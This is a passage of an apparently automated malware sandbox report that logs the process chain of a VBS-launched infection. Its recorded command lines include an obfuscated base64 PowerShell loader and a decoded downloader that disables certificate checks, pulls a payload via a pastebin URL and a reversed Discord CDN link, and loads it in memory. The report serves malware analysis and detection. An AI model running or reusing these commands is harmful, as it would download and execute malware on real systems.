?O??3?DE?MgBh?Dg?NQBj?DU?O?Bh?DM?OQ?5?DU?Zg?x?GE?Z??2?GI?OQBj?Dk?MQ?1?DY?Nw?w?GQ?NgBk?GE?Yg?x?GE?PQBt?Gg?JgBm?Dg?MQ?4?GQ?O??2?DY?PQBz?Gk?JgBm?D??MwBk?GU?O??2?DY?PQB4?GU?PwB0?Hg?d??u?Dc?Lg?5?Gk?dgBu?GU?Lw?4?DM?N??1?DQ?Mg?2?DY?MQ?2?DQ?O??x?D??Mw?w?DY?Mg?x?C8?MQ?2?DI?N??x?Dc?OQ?w?DY?Mg?z?DI?Nw?z?DM?NQ?x?DI?MQ?v?HM?d?Bu?GU?bQBo?GM?YQB0?HQ?YQ?v?G0?bwBj?C4?c?Bw?GE?Z?By?G8?YwBz?Gk?Z??u?G4?Z?Bj?C8?Lw?6?HM?c?B0?HQ?a??n?C??L??g?CQ?bQBo?HM?ZgBv?C??L??g?Cc?XwBf?F8?XwBf?GQ?ZwBm?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?C0?LQ?t?C0?LQ?t?C0?Jw?s?C??J?Bs?H??cgBr?Gw?L??g?Cc?MQ?n?Cw?I??n?FI?bwBk?GE?Jw?g?Ck?KQ?7??==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $MkplqW.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\envifa.vbs');powershell -command $KByHL;$global:?
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $MkplqW = 'J Bs H cgBr Gw I 9 C Jw w Cc Ow k G0 a Bz GY bw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb FM eQBz HQ ZQBt C4 TgBl HQ LgBT GU cgB2 Gk YwBl F bwBp G4 d BN GE bgBh Gc ZQBy F0 Og 6 FM ZQBy HY ZQBy EM ZQBy HQ aQBm Gk YwBh HQ ZQBW GE b Bp GQ YQB0 Gk bwBu EM YQBs Gw YgBh GM aw g D0 I B7 CQ d By HU ZQB9 Ds WwBT Hk cwB0 GU bQ u E4 ZQB0 C4 UwBl HI dgBp GM ZQBQ G8 aQBu HQ TQBh G4 YQBn GU cgBd Do OgBT GU YwB1 HI aQB0 Hk U By G8 d Bv GM bwBs C PQ g Fs UwB5 HM d Bl G0 LgBO GU d u FM ZQBj HU cgBp HQ eQBQ HI bwB0 G8 YwBv Gw V B5 H ZQBd Do OgBU Gw cw x DI OwBb EI eQB0 GU WwBd F0 I k Ho Z Bt Hc a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K g Cg TgBl Hc LQBP GI agBl GM d g E4 ZQB0 C4 VwBl GI QwBs Gk ZQBu HQ KQ u EQ bwB3 G4 b Bv GE Z BT HQ cgBp G4 Zw o Cc a B0 HQ c 6 C8 LwBw GE cwB0 GU YgBp G4 LgBj G8 bQ v HI YQB3 C8 Vg 5 Hk NQBR DU dgB2 Cc KQ g Ck I p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J B6 GQ bQB3 Gg KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DM LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc TQBz HE QgBJ GI WQ n Ck LgBJ G4 dgBv Gs ZQ o CQ bgB1 Gw b s C WwBv GI agBl GM d Bb F0 XQ g Cg Jw m DY O w GQ MQ 4 GU N Bm DM YgBm DY N 1 DY Yw x DM NgBh Dk M Bk DM MQ w GQ O 3 DE MgBh Dg NQBj DU O Bh DM OQ 5 DU Zg x GE Z 2 GI OQBj Dk MQ 1 DY Nw w GQ NgBk GE Yg x GE PQBt Gg JgBm Dg MQ 4 GQ O 2 DY PQBz Gk JgBm D MwBk GU O 2 DY PQB4 GU PwB0 Hg d u Dc Lg 5 Gk dgBu GU Lw 4 DM N 1 DQ Mg 2 DY MQ 2 DQ O x D Mw w DY Mg x C8 MQ 2 DI N x Dc OQ w DY Mg z DI Nw z DM NQ x DI MQ v HM d Bu GU bQBo GM YQB0 HQ YQ v G0 bwBj C4 c Bw GE Z By G8 YwBz Gk Z u G4 Z Bj C8 Lw 6 HM c B0 HQ a n C L g CQ bQBo HM ZgBv C L g Cc XwBf F8 XwBf GQ ZwBm F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 Jw s C J Bs H cgBr Gw L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $MkplqW.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\envifa.vbs');powershell -command $KByHL;
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$lprkl = '0';$mhsfo = 'C:\Users\user\Desktop\envifa.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $zdmwh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($zdmwh).GetType('ClassLibrary3.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&680d18e4f3bf6456c136a90d310d8712a85c58a3995f1ad6b9c915670d6dab1a=mh&f818d866=si&f03de866=xe?txt.7.9ivne/8345426616481030621/1624179062327335121/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $mhsfo , '_____dgf_______________________________________-------', $lprkl, '1', 'Roda' ));"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $MkplqW = 'J Bs H cgBr Gw I 9 C Jw w Cc Ow k G0 a Bz GY bw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb FM eQBz HQ ZQBt C4 TgBl HQ LgBT GU cgB2 Gk YwBl F bwBp G4 d BN GE bgBh Gc ZQBy F0 Og 6 FM ZQBy HY ZQBy EM ZQBy HQ aQBm Gk YwBh HQ ZQBW GE b Bp GQ YQB0 Gk bwBu EM YQBs Gw YgBh GM aw g D0 I B7 CQ d By HU ZQB9 Ds WwBT Hk cwB0 GU bQ u E4 ZQB0 C4 UwBl HI dgBp GM ZQBQ G8 aQBu HQ TQBh G4 YQBn GU cgBd Do OgBT GU YwB1 HI aQB0 Hk U By G8 d Bv GM bwBs C PQ g Fs UwB5 HM d Bl G0 LgBO GU d u FM ZQBj HU cgBp HQ eQBQ HI bwB0 G8 YwBv Gw V B5 H ZQBd Do OgBU Gw cw x DI OwBb EI eQB0 GU WwBd F0 I k Ho Z Bt Hc a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K g Cg TgBl Hc LQBP GI agBl GM d g E4 ZQB0 C4 VwBl GI QwBs Gk ZQBu HQ KQ u EQ bwB3 G4 b Bv GE Z BT HQ cgBp G4 Zw o Cc a B0 HQ c 6 C8 LwBw GE cwB0 GU YgBp G4 LgBj G8 bQ v HI YQB3 C8 Vg 5 Hk NQBR DU dgB2 Cc KQ g Ck I p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J B6 GQ bQB3 Gg KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DM LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc TQBz HE QgBJ GI WQ n Ck LgBJ G4 dgBv Gs ZQ o CQ bgB1 Gw b s C WwBv GI agBl GM d Bb F0 XQ g Cg Jw m DY O w GQ MQ 4 GU N Bm DM YgBm DY N 1 DY Yw x DM NgBh Dk M Bk DM MQ w GQ O 3 DE MgBh Dg NQBj DU O Bh DM OQ 5 DU Zg x GE Z 2 GI OQBj Dk MQ 1 DY Nw w GQ NgBk GE Yg x GE PQBt Gg JgBm Dg MQ 4 GQ O 2 DY PQBz Gk JgBm D MwBk GU O 2 DY PQB4 GU PwB0 Hg d u Dc Lg 5 Gk dgBu GU Lw 4 DM N 1 DQ Mg 2 DY MQ 2 DQ O x D Mw w DY Mg x C8 MQ 2 DI N x Dc OQ w DY Mg z DI Nw z DM NQ x DI MQ v HM d Bu GU bQBo GM YQB0 HQ YQ v G0 bwBj C4 c Bw GE Z By G8 YwBz Gk Z u G4 Z Bj C8 Lw 6 HM c B0 HQ a n C L g CQ bQBo HM ZgBv C L g Cc XwBf F8 XwBf GQ ZwBm F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 Jw s C J Bs H cgBr Gw L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $MkplqW.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\envifa.vbs');powershell -command $KByHL;Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$lprkl = '0';$mhsfo = 'C:\Users\user\Desktop\envifa.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $zdmwh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($zdmwh).GetType('ClassLibrary3.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&680d18e4f3bf6456c136a90d310d8712a85c58a3995f1ad6b9c915670d6dab1a=mh&f818d866=si&f03de866=xe?txt.7.9ivne/8345426616481030621/1624179062327335121/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $mhsfo , '_____dgf_______________________________________-------', $lprkl, '1', 'Roda' ));"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,4_2_0041CB50
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B88346D push eax; ret 1_2_00007FFD9B88348B
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B874BD7 push FFFFFFCBh; retf 3_2_00007FFD9B874CD2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B877147 push FFFFFFE7h; iretd 3_2_00007FFD9B877154
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B875EFA push eax; retf 3_2_00007FFD9B875F51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00457106 push ecx; ret 4_2_00457119
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0045B11A push esp; ret 4_2_0045B141
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00457A28 push eax; ret 4_2_00457A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00434E56 push ecx; ret 4_2_00434E69
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00406EB0 ShellExecuteW,URLDownloadToFileW,4_2_00406EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,4_2_0041AA4A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,4_2_0041CB50
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
